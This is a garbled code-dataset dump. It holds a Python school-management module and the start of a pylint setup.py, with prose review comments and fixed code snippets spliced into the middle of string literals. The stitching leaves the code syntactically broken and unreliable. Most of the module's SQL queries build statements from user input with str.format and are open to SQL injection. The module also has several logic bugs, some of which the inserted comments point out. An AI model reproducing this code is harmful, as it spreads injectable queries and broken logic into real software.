('{}', '{}', 
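submit_assignment above (like most writes in this module) interpolates user input straight into SQL with str.format, which breaks on quotes and is injectable. sqlite3 supports ? placeholders, so the same INSERT can be bound safely; a sketch keeping the module's own table and column spellings:

import datetime
import sqlite3

def submit(db_path, student_id, assignment_id, result):
    # Connection context manager commits on success, rolls back on error.
    with sqlite3.connect(db_path) as data:
        # Placeholders let the driver escape the values; nothing is spliced
        # into the SQL text itself.
        data.execute(
            "INSERT INTO Submission (ID_Student, ID_Assignment, Result, Submittion_date) "
            "VALUES (?, ?, ?, ?)",
            (student_id, assignment_id, result, datetime.date.today().isoformat()),
        )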
'{}', '{}')\".format(row, assignment_id[0], result[0], submission_date))\n data.commit()\n data.close()\n\n def check_my_attendance(self):\n \"\"\"\n Method allows student to check attendance level in %\n\n Return:\n percent of attendance\n\n \"\"\"\n student_id = self._id\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT COUNT(Presence) FROM `Attendance` WHERE ID_Student='{}'\"\n \"AND `Presence`= 0\".format(student_id))\n presence = cursor.fetchall()\n number_of_presence = float(presence[0][0])\n cursor.execute(\"SELECT COUNT(Presence) FROM `Attendance`\")\n number_of_days = cursor.fetchall()\n days = float(number_of_days[0][0])\n if days == 0:\n print(\"No attendance!\")\n return\n # TODO: new validation\n percent_of_attendance = (number_of_presence / days) * 100\n percent_of_attendance_list =[]\n percent_of_attendance_list.append([percent_of_attendance])\n data.commit()\n data.close()\n return percent_of_attendance_list\n\n\nclass Mentor(Employee):\n \"\"\"Class creates object mentor\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize mentor object that inherits from User class\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n\n def add_student(self):\n \"\"\"\n Method allows mentor to add student to students list\n\n Args:\n None\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Provide information about new student\")\n\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('Data should have format: YYYY-MM-DD')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData format: YYYY-MM-DD\\n')\n return\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"INSERT INTO `User` (`name`, `surname`, `gender`, `birth_date`, `email`, `login`, `password`, `user_type`) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}')\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], \"student\"))\n data.commit()\n data.close()\n print(\"Student was added.\")\n\n def check_attendance(self):\n \"\"\"\n Method allows mentor check students attendance\n\n Args:\n None\n Return:\n None\n \"\"\"\n students_list = []\n ids = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT id, name, surname FROM user WHERE User_type='student'\")\n students = cursor.fetchall()\n for student in students:\n students_list.append(student[1]+\" \"+student[2])\n ids.append(student[0])\n presences = ui.Ui.get_inputs(students_list, \"Starting attendance check (mark 0 for absence, 1 for present)\")\n i = 0\n for presence in presences:\n cursor.execute(\"INSERT INTO attendance (ID_Student, Date, Presence) VALUES ('{}', '{}', '{}')\"\n .format(ids[i], str(datetime.date.today()), presence))\n i += 1\n data.commit()\n data.close()\n print(\"Checking attendance finished\")\n\n\n def remove_student(self):\n \"\"\"\n Method allows mentor remove students 
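check_my_attendance above counts rows WHERE Presence = 0 as the student's presences, while the mentor-side check_attendance stores 1 for present ("mark 0 for absence, 1 for present"), and its denominator counts attendance rows for every student rather than this one, so the percentage is doubly off. A sketch of the corrected query under the 1-means-present convention:

import sqlite3

def attendance_percent(db_path, student_id):
    with sqlite3.connect(db_path) as data:
        present, total = data.execute(
            # CAST guards against Presence having been stored as text '1';
            # both counts are restricted to this student's rows.
            "SELECT SUM(CASE WHEN CAST(Presence AS INTEGER) = 1 THEN 1 ELSE 0 END), COUNT(*) "
            "FROM Attendance WHERE ID_Student = ?",
            (student_id,),
        ).fetchone()
    return None if not total else 100.0 * present / total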
from students list\n\n Args:\n None\n Return:\n None\n \"\"\"\n self.list_students()\n options = ui.Ui.get_inputs([\"\"], \"Enter number to erase student from database: \")\n if int(options[0]) < 0 or int(options[0]) > len(self.list_students()):\n print(\"There is no such student number on the list\")\n return\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `user` WHERE `user_type`='student'\")\n students = cursor.fetchall()\n student_to_erase_name = students[int(options[0])-1][1]\n student_to_erase_surname = students[int(options[0])-1][2]\n print(student_to_erase_name, student_to_erase_surname)\n cursor.execute(\"DELETE FROM `User` WHERE `name`='{}' AND `surname`='{}'\"\n .format(student_to_erase_name, student_to_erase_surname))\n data.commit()\n data.close()\n print(\"Student was erased.\")\n\n\n def edit_student(self):\n \"\"\"\n Method allows mentor edit students specific data\n\n Args:\n None\n Return:\n None\n \"\"\"\n self.list_students()\n choosed_student = ui.Ui.get_inputs([\"\"], \"Enter number to edit student's data\")\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Edit information about student\")\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('Data should have format: YYYY-MM-DD')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData format: YYYY-MM-DD\\n')\n return\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `user` WHERE `user_type`='student'\")\n students = cursor.fetchall()\n student_to_edit_name = students[int(choosed_student[0]) - 1][1]\n student_to_edit_surname = students[int(choosed_student[0]) - 1][2]\n\n cursor.execute(\n \"UPDATE `User` SET `name`='{}', `surname`='{}', `gender`='{}', `birth_date`='{}', `email`='{}', `login`='{}', `password`='{}' \"\n \" WHERE \"\n \"`name`='{}' AND `surname`='{}'\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], student_to_edit_name, student_to_edit_surname))\n data.commit()\n data.close()\n print(\"Update completed\")\n\n def show_submissions_to_grade(self):\n \"\"\"\n Method allows mentor show submissions to grade\n\n Args:\n None\n Return:\n List of lists with submissions to grade\n \"\"\"\n return_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n submissions_not_graded = cursor.execute(\n\"SELECT Assignment.ID, Assignment.Name, Assignment.delivery_date, User.Name, User.Surname, Submission.Submittion_date \"\n\"FROM Submission \"\n\"INNER JOIN Assignment ON Assignment.ID=Submission.ID \"\n\"INNER JOIN User ON user.ID=Submission.ID_Student \"\n\"WHERE Submission.Grade IS NULL OR Submission.Grade=''\").fetchall()\n if len(submissions_not_graded) == 0:\n print(\"No submissions to grade\")\n return None\n for submission in submissions_not_graded:\n return_list.append([submission[0], submission[1], submission[2],\n submission[3], submission[4], submission[5]])\n data.close()\n return return_list\n\n def grade_submission(self):\n \"\"\"\n Method allows mentor grade students submitted assignment\n\n Args:\n None\n Return:\n None\n \"\"\"\n id_assignment_to_grade = ui.Ui.get_inputs([\"\"], \"Choose assignment to grade\")\n grade = ui.Ui.get_inputs([\"\"], \"Enter grade for assignment\")\n data = 
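remove_student above resolves the chosen row to a name/surname pair and deletes by those columns, which removes every student who happens to share the name. Deleting by the primary key the SELECT already returned avoids that; a sketch:

import sqlite3

def remove_student_by_index(db_path, index):
    with sqlite3.connect(db_path) as data:
        students = data.execute(
            "SELECT id FROM User WHERE user_type='student'"
        ).fetchall()
        if not 1 <= index <= len(students):
            return False
        # Delete by primary key: unique even when two students share a name.
        data.execute("DELETE FROM User WHERE id = ?", (students[index - 1][0],))
    return True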
sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"UPDATE Submission SET Grade={} WHERE ID={}\".format(grade[0], int(id_assignment_to_grade[0])))\n print(\"Submission graded\")\n data.commit()\n data.close()\n\n def add_assignment(self):\n \"\"\"\n Method allows mentor add new assignment\n\n Args:\n None\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"Name\", \"Type\", \"Max. points to receive\", \"Delivery date\", \"Content\"],\n \"Provide information about new assignment\")\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\n \"INSERT INTO `assignment` (`name`, `type`, `max_points`, `delivery_date`, `content`) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}')\"\n .format(options[0], options[1], options[2], options[3],\n options[4]))\n data.commit()\n data.close()\n print(\"Assignment was added.\")\n\n def list_teams(self):\n \"\"\"\n Method allows mentor to list teams\n\n Args:\n None\n Return:\n None\n \"\"\"\n team_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT user.id, team_name, name, surname FROM teams \"\n \"INNER JOIN user ON teams.id_student=user.id ORDER BY team_name\")\n teams = cursor.fetchall()\n for team in teams:\n team_list.append([team[0], team[1], team[2], team[3]])\n data.close()\n return team_list\n\n def add_team(self):\n choosed_student_and_team = ui.Ui.get_inputs([\"Enter number to add student to team: \", \"Team name for student: \"], \"\")\n student_to_add_id = int(choosed_student_and_team[0]) # id student to add to team\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n\n cursor.execute(\"SELECT * FROM teams WHERE ID_Student='{}'\".format(student_to_add_id)) # check if student already is in team\n team_row = cursor.fetchone()\n if team_row:\n cursor.execute(\"DELETE FROM teams WHERE ID_Student='{}'\"\n .format(student_to_add_id))\n\n cursor.execute(\"INSERT INTO teams (ID_Student, Team_name) VALUES ('{}', '{}')\"\n .format(student_to_add_id, choosed_student_and_team[1]))\n data.commit()\n data.close()\n print(\"Team updated.\")\n\n\n def list_checkpoint_assignments(self):\n \"\"\"\n Method allows mentor to list checkpoint assignments\n\n Args:\n None\n Return:\n None\n \"\"\"\n checkpoint_assignments_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM Checkpoint_assignment\")\n assignments = cursor.fetchall()\n n = 1\n for assignment in assignments:\n if assignment[2] == None:\n checkpoint_assignments_list.append([str(n) + \".\", assignment[1], ''])\n\n else:\n checkpoint_assignments_list.append([str(n) + \".\", assignment[1], assignment[2]])\n n += 1\n data.close()\n return checkpoint_assignments_list\n\n def get_checkpoint_id(self):\n \"\"\"\n Returns id of checkpoint\n\n Args:\n None\n Return:\n id of checkpoint\n \"\"\"\n choosed_checkpoint = ui.Ui.get_inputs([\"\"], \"Choose checkpoint to grade student\")\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM Checkpoint_assignment\")\n checkpoint = cursor.fetchall()\n checkpoint_id = checkpoint[int(choosed_checkpoint[0]) - 1][0]\n data.close()\n return checkpoint_id\n\n def add_checkpoint_submission(self, checkpoint_assignment_id):\n \"\"\"\n Method allows mentor to add cards to particular student\n\n Args:\n checkpoint_assignment_id: id of particular assignment\n Return:\n None\n \"\"\"\n choosed_student = ui.Ui.get_inputs([\"\"], \"Choose student to add checkpoint 
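show_submissions_to_grade above joins Assignment ON Assignment.ID = Submission.ID, i.e. on the submission's own row id, while every other query in the module links the tables through Submission.ID_Assignment (see view_my_grades), so that join pairs submissions with unrelated assignments. The corrected join, as a sketch:

UNGRADED_SQL = (
    "SELECT Assignment.ID, Assignment.Name, Assignment.Delivery_date, "
    "User.Name, User.Surname, Submission.Submittion_date "
    "FROM Submission "
    # Join through the foreign key, matching view_my_grades, not Submission.ID.
    "INNER JOIN Assignment ON Assignment.ID = Submission.ID_Assignment "
    "INNER JOIN User ON User.ID = Submission.ID_Student "
    "WHERE Submission.Grade IS NULL OR Submission.Grade = ''"
)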
results\")\n student_to_add_id = int(choosed_student[0])\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n card = ui.Ui.get_inputs([\"\"], \"Choose card to add (Enter to not assign)\")\n\n cursor.execute(\"SELECT * FROM Checkpoint_submittion \"\n \"WHERE ID_Student='{}' AND ID_Assignment='{}'\"\n .format(student_to_add_id, checkpoint_assignment_id))\n\n _data = cursor.fetchone()\n if _data is None:\n cursor.execute(\"INSERT INTO Checkpoint_submittion (ID_Student, Date, Card, ID_Mentor, ID_Assignment) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}')\"\n .format(student_to_add_id, datetime.date.today(), card[0], self._id, checkpoint_assignment_id))\n data.commit()\n print(\"Checkpoint submission added.\")\n else:\n print(\"Checkpoint already graded.\")\n data.close()\n\n def check_student_performance(self):\n \"\"\"\n Method allows mentor to check performance of particular student by showing hes statistics\n\n Args:\n None\n Return:\n None\n \"\"\"\n return_list = []\n choosed_student = ui.Ui.get_inputs([\"\"], \"Choose student to check hes performance\")\n student_to_check_id = int(choosed_student[0])\n period = ui.Ui.get_inputs([\"Date from\", \"Date to\"], \"Enter dates for performance check\")\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT name, surname FROM user where ID={}\".format(student_to_check_id))\n _data = cursor.fetchone()\n student_name = _data[0]\n student_surname = _data[1]\n\n cursor.execute(\"SELECT * FROM attendance where id_student={} AND date BETWEEN '{}' AND '{}'\"\n .format(student_to_check_id, period[0], period[1]))\n _data = cursor.fetchall()\n all_days = 0\n days_in_school = 0\n for item in _data:\n all_days += 1\n if item[3] == \"1\":\n days_in_school += 1\n avg_days = round(days_in_school/all_days, 2)\n\n cursor.execute(\"SELECT Grade FROM Submission where id_student={} AND Submittion_date BETWEEN '{}' AND '{}'\"\n .format(student_to_check_id, period[0], period[1]))\n _data = cursor.fetchall()\n grades_quantity = 0\n grades_sum = 0\n for item in _data:\n grades_quantity += 1\n grades_sum += item[0]\n if grades_quantity:\n grades_avg = round(grades_sum/grades_quantity, 2)\n else:\n grades_avg = 0\n\n cursor.execute(\"SELECT Card FROM Checkpoint_submittion where id_student={} AND date BETWEEN '{}' AND '{}'\"\n .format(student_to_check_id, period[0], period[1]))\n _data = cursor.fetchall()\n yellow_cards = 0\n red_cards = 0\n for item in _data:\n if item[0] == \"yellow\":\n yellow_cards += 1\n elif item[0] == \"red\":\n red_cards += 1\n\n return_list.append([student_name, student_surname, avg_days,\n grades_avg, yellow_cards, red_cards])\n data.close()\n return return_list\n\n\nclass Manager(Employee):\n \"\"\"Class creates object mentor\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize mentor object that inherits from User class\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n\n @staticmethod\n def add_mentor():\n \"\"\"\n Method allows manager to add mentor to mentors list\n\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Provide information about new 
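check_student_performance above divides by all_days without checking for an empty attendance range, and adds item[0] to grades_sum even when Grade is NULL, which raises a TypeError on None. A sketch of the two aggregations with guards, keeping the module's convention of presence stored as the string "1":

def safe_averages(attendance_rows, grade_rows):
    # attendance_rows: (id, id_student, date, presence) tuples, presence as "0"/"1".
    all_days = len(attendance_rows)
    days_in_school = sum(1 for row in attendance_rows if row[3] == "1")
    avg_days = round(days_in_school / all_days, 2) if all_days else 0.0

    # Skip ungraded submissions instead of summing None.
    grades = [g for (g,) in grade_rows if g is not None]
    grades_avg = round(sum(grades) / len(grades), 2) if grades else 0.0
    return avg_days, grades_avg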
mentor\")\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('\\nData should have format: YYYY-MM-DD\\n')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData should have format: YYYY-MM-DD\\n')\n return\n\n # new_mentor = Mentor(options[0], options[1], options[2], options[3], options[4], options[5],\n # options[6])\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"INSERT INTO `User`(Name, Surname, Gender, Birth_date, Email, Login, Password, User_type) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}')\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], \"mentor\"))\n data.commit()\n data.close()\n print(\"Mentor was added.\")\n\n @staticmethod\n def remove_mentor():\n \"\"\"\n Method allows manager to remove mentor from mentors list\n\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"\"], \"Enter number to erase mentor from database\")\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n records = cursor.execute(\"SELECT COUNT(`Name`) FROM `User` WHERE `User_Type` = 'mentor'\")\n records = records.fetchall()\n number_of_records = int(records[0][0])\n\n if int(options[0]) < 0 or int(options[0]) > number_of_records-1:\n print(\"There is no such mentor number on the list\")\n return\n\n\n cursor.execute(\"SELECT * FROM `User` WHERE `User_type`='mentor'\")\n mentors = cursor.fetchall()\n mentor_name = mentors[int(options[0]) - 1][1]\n mentor_surname = mentors[int(options[0]) - 1][2]\n cursor.execute(\"DELETE FROM `User` WHERE `Name`='{}' AND `Surname`='{}'\"\n .format(mentor_name, mentor_surname))\n data.commit()\n data.close()\n print(\"Mentor was erased.\")\n\n @staticmethod\n def edit_mentor():\n \"\"\"\n Method allows manager to edit mentor specific data\n\n Return:\n None\n \"\"\"\n\n mentor_to_update = ui.Ui.get_inputs([\"\"], \"Enter number to edit mentor's data\")\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n records = cursor.execute(\"SELECT COUNT(`Name`) FROM `User` WHERE `User_Type` = 'mentor'\")\n records = records.fetchall()\n number_of_records = int(records[0][0])\n\n if int(mentor_to_update[0]) < 1 or int(mentor_to_update[0]) > number_of_records-1:\n print(\"There is no such mentor number on the list\")\n return\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Edit information about student\")\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('Data should have format: YYYY-MM-DD')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData format: YYYY-MM-DD\\n')\n return\n\n cursor.execute(\"SELECT * FROM `User` WHERE `User_type`='mentor'\")\n mentors = cursor.fetchall()\n mentor_to_update_name = mentors[int(mentor_to_update[0]) - 1][1]\n mentor_to_update_surname = mentors[int(mentor_to_update[0]) - 1][2]\n\n cursor.execute(\n \"UPDATE `User` SET `Name`='{}', `Surname`='{}', `Gender`='{}', `Birth_date`='{}',\"\n \" `Email`='{}', `Login`='{}', `Password`='{}' \"\n \" WHERE \"\n \"`Name`='{}' AND `Surname`='{}'\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], 
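add_mentor above only rejects a birth date when it is purely alphabetic, so inputs like "31-12-1990" slip through the YYYY-MM-DD requirement. The module already builds User.date_validate around strptime, and the same check works standalone; a sketch:

import datetime

def is_valid_birth_date(text):
    # Mirrors User.date_validate: accept only the YYYY-MM-DD format.
    try:
        datetime.datetime.strptime(text, "%Y-%m-%d")
        return True
    except ValueError:
        return False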
mentor_to_update_name, mentor_to_update_surname ))\n data.commit()\n data.close()\n print(\"Update completed\")\n\n @staticmethod\n def list_mentors():\n \"\"\"\n Method allows manager to list all mentor from list\n\n Return:\n mentor_list\n \"\"\"\n mentor_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='mentor'\")\n mentors = cursor.fetchall()\n n = 1\n for mentor in mentors:\n mentor_list.append([str(n) + \".\", mentor[1], mentor[2]])\n n += 1\n data.commit()\n data.close()\n return mentor_list\n\n @staticmethod\n def view_mentors_details():\n \"\"\"\n Returns mentors details list to display\n\n Returns:\n\n student detail list\n \"\"\"\n mentors_details_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='mentor'\")\n mentors = cursor.fetchall()\n n = 1\n for mentor in mentors:\n mentors_details_list.append([str(n) + \".\", mentor[1], mentor[2], mentor[3], mentor[4],\n mentor[5], mentor[6], mentor[7]])\n n += 1\n data.commit()\n data.close()\n return mentors_details_list\n\n @staticmethod\n def average_grade_for_student():\n \"\"\"\n Method display average grade for choosen student\n\n\n Return:\n average grade for student\n\n \"\"\"\n options = ui.Ui.get_inputs([\"\"], \"Enter the number of student to see his average grade\")\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n records = cursor.execute(\"SELECT COUNT(`Name`) FROM `User` WHERE `User_Type` = 'student'\")\n records = records.fetchall()\n number_of_records = int(records[0][0])\n\n if int(options[0]) < 1 or int(options[0]) > number_of_records:\n print(\"There is no such student on the list\")\n return\n\n average_grade_list = []\n cursor.execute(\"SELECT * FROM `User` WHERE `User_type`='student'\")\n students = cursor.fetchall()\n student_id = students[int(options[0]) - 1][0]\n student_name = students[int(options[0]) - 1][1]\n student_surname = students[int(options[0]) - 1][2]\n record = cursor.execute(\"SELECT AVG(Grade) FROM `Submission` WHERE `Grade` IS NOT NULL AND `ID_Student`='{}'\"\n .format(student_id))\n record = record.fetchall()\n average_grade = int(record[0][0])\n average_grade_list.append([student_name, student_surname, average_grade])\n data.commit()\n data.close()\n return average_grade_list\n\n\n @staticmethod\n def which_mentor_is_a_monster():\n \"\"\"\n Method display checkpoint cards statistics of mentors\n\n\n Return:\n list with card statistics\n\n \"\"\"\n list_to_print = []\n cards_statistics = {}\n mentors = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cards = cursor.execute(\"SELECT `Name`, `Surname`, `Card` \"\n \"FROM `Checkpoint_submittion` \"\n \"INNER JOIN `User` ON Checkpoint_submittion.ID_Mentor = User.ID \")\n cards = cards.fetchall()\n for row in cards:\n name_surname = str(row[0]) + ' ' + str(row[1])\n cards_statistics[name_surname] = [0, 0, 0] #Cards [red,yellow,green] # row[1]- surname change for name,surname or ID_Mentor\n mentors.append(name_surname)\n mentors = list(set(mentors))\n for mentor in mentors:\n for row in cards:\n if str(row[0]) + ' ' + str(row[1]) == mentor:\n if str(row[2]) == 'red':\n cards_statistics[mentor][0] += 1\n if str(row[2]) == 'yellow':\n cards_statistics[mentor][1] += 1\n if str(row[2]) == 'green':\n cards_statistics[mentor][2] += 1\n for key, value in cards_statistics.items():\n temp = [key, value[0], value[1], value[2]]\n list_to_print.append(temp)\n 
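remove_mentor and edit_mentor above reject choices greater than number_of_records - 1, which makes the last mentor on the 1-based menu (list_mentors numbers entries 1..n) unreachable; remove_mentor additionally accepts 0. The bounds check should run from 1 to number_of_records inclusive, as in this sketch:

def valid_choice(choice, number_of_records):
    # 1-based menu: every index from 1 through number_of_records is selectable.
    return 1 <= choice <= number_of_records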
data.commit()\n data.close()\n return list_to_print\n\n @staticmethod\n def grades_stats_for_mentors():\n \"\"\"\n Method display how many assignment mentor graded and what is his average grade\n\n\n Return:\n list with grade statistics\n\n \"\"\"\n grades_statistics = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n grades = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(`Grade`), AVG(`Grade`)\"\n \"FROM `Submission` INNER JOIN `User` ON `Submission`.ID_Mentor = User.ID\"\n \" GROUP BY `Name`\")\n list_to_print = []\n grades = grades.fetchall()\n for row in grades:\n grades_statistics.append(row)\n for row in grades_statistics:\n list_to_print.append([row[0], row[1], row[2], row[3]])\n return list_to_print\n\n @staticmethod\n def full_stats_for_students():\n\n student_stats = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n grades = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(`Grade`), AVG(`Grade`)\"\n \"FROM `Submission` INNER JOIN `User` ON `Submission`.ID_Student = User.ID\"\n \" GROUP BY `Name`\")\n grades = grades.fetchall()\n for row in grades:\n student_stats.append(row)\n list_to_print = []\n for row in student_stats:\n list_to_print.append([row[0], row[1], row[2], row[3]])\n return list_to_print\n\n # # TODO: return list with percent of attendance for every student...\n # presence = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(CASE WHEN Presence = 1 THEN 1 ELSE NULL END)\"\n # \" FROM `Attendance` \"\n # \"INNER JOIN `User` ON Attendance.ID_Student = User.ID \"\n # \"GROUP BY `Name`\")\n # presence = presence.fetchall()\n #\n # percent_of_attendance = []\n #\n # for row in presence:\n # percent_of_attendance.append(row)\n # print (percent_of_attendance)\n #\n # number_of_all_day = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(Presence)\"\n # \" FROM `Attendance` \"\n # \"INNER JOIN `User` ON Attendance.ID_Student = User.ID \"\n # \"GROUP BY `Name`\")\n #\n # number_of_all_day = number_of_all_day.fetchall()\n # for number in number_of_all_day:\n # for index, element in enumerate(percent_of_attendance):\n # if number[0] == element[0] and number[1] == element[1]:\n # percent_of_attendance[index][2] = str((element[0][2]/int(number[2])) * 100)\n #\n # print (percent_of_attendance)","repo_name":"BlakPolak/SchoolManagmentSystem","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":39967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"38365688125","text":"from __future__ import absolute_import, print_function\n__docformat__ = \"restructuredtext en\"\n\nimport os\nimport sys\nimport shutil\nfrom os.path import isdir, exists, join\n\ntry:\n from setuptools import setup\n from setuptools.command import easy_install as easy_install_lib\n from setuptools.command import install_lib\n USE_SETUPTOOLS = 1\nexcept ImportError:\n from distutils.core import setup\n from distutils.command import install_lib\n USE_SETUPTOOLS = 0\n easy_install_lib = None\n\nfrom distutils.command.build_py import build_py\n\n\nbase_dir = os.path.dirname(__file__)\n\n__pkginfo__ = {}\nwith open(os.path.join(base_dir, \"pylint\", \"__pkginfo__.py\")) as f:\n exec(f.read(), __pkginfo__)\nmodname = __pkginfo__['modname']\ndistname = __pkginfo__.get('distname', modname)\nscripts = __pkginfo__.get('scripts', [])\ndata_files = __pkginfo__.get('data_files', None)\ninclude_dirs = __pkginfo__.get('include_dirs', [])\next_modules = __pkginfo__.get('ext_modules', None)\ninstall_requires 
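grades_stats_for_mentors above (and full_stats_for_students below it) GROUP BY Name, so two users who share a first name collapse into one aggregated row. Grouping on the joined User.ID keeps rows distinct; a sketch of the mentor query:

MENTOR_GRADE_STATS_SQL = (
    "SELECT User.Name, User.Surname, COUNT(Submission.Grade), AVG(Submission.Grade) "
    "FROM Submission INNER JOIN User ON Submission.ID_Mentor = User.ID "
    # Group on the primary key so same-named mentors stay separate rows.
    "GROUP BY User.ID"
)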
= __pkginfo__.get('install_requires', None)\ndependency_links = __pkginfo__.get('dependency_links', [])\nextras_require = __pkginfo__.get('extras_require', {})\n\nreadme_path = join(base_dir, 'README.rst')\nif exists(readme_path):\n with open(readme_path) as stream:\n long_description = stream.read()\nelse:\n long_description = ''\n\n\ndef ensure_scripts(linux_scripts):\n \"\"\"Creates the proper script names required for each platform\n (taken from 4Suite)\n \"\"\"\n from distutils import util\n if util.get_platform()[:3] == 'win':\n return linux_scripts + [script + '.bat' for script in linux_scripts]\n return linux_scripts\n\n\ndef get_packages(directory, prefix):\n \"\"\"return a list of subpackages for the given directory\"\"\"\n result = []\n for package in os.listdir(directory):\n absfile = join(directory, package)\n if isdir(absfile):\n if exists(join(absfile, '__init__.py')):\n if prefix:\n result.append('%s.%s' % (prefix, package))\n else:\n result.append(package)\n result += get_packages(absfile, result[-1])\n return result\n\n\ndef _filter_tests(files):\n testdir = join('pylint', 'test')\n return [f for f in files if testdir not in f]\n\n\nclass MyInstallLib(install_lib.install_lib):\n \"\"\"extend install_lib command to handle package __init__.py and\n include_dirs variable if necessary\n \"\"\"\n def run(self):\n \"\"\"overridden from install_lib class\"\"\"\n install_lib.install_lib.run(self)\n # manually install included directories if any\n if include_dirs:\n for directory in include_dirs:\n dest = join(self.install_dir, directory)\n if sys.version_info >= (3, 0):\n exclude = {'invalid_encoded_data*', 'unknown_encoding*'}\n else:\n exclude = set()\n shutil.rmtree(dest, ignore_errors=True)\n shutil.copytree(directory, dest,\n ignore=shutil.ignore_patterns(*exclude))\n\n # override this since pip/easy_install attempt to byte compile test data\n # files, some of them being syntactically wrong by design, and this scares\n # the end-user\n def byte_compile(self, files):\n files = _filter_tests(files)\n install_lib.install_lib.byte_compile(self, files)\n\n\nif easy_install_lib:\n class easy_install(easy_install_lib.easy_install):\n # override this since pip/easy_install attempt to byte compile\n # test data files, some of them being syntactically wrong by design,\n # and this scares the end-user\n def byte_compile(self, files):\n files = _filter_tests(files)\n easy_install_lib.easy_install.byte_compile(self, files)\n\n\ndef install(**kwargs):\n \"\"\"setup entry point\"\"\"\n if USE_SETUPTOOLS:\n if '--force-manifest' in sys.argv:\n sys.argv.remove('--force-manifest')\n packages = [modname] + get_packages(join(base_dir, 'pylint'), modname)\n if USE_SETUPTOOLS:\n if install_requires:\n kwargs['install_requires'] = install_requires\n kwargs['dependency_links'] = dependency_links\n kwargs['entry_points'] = {'console_scripts': [\n 'pylint = pylint:run_pylint',\n 'epylint = pylint:run_epylint',\n 'pyreverse = pylint:run_pyreverse',\n 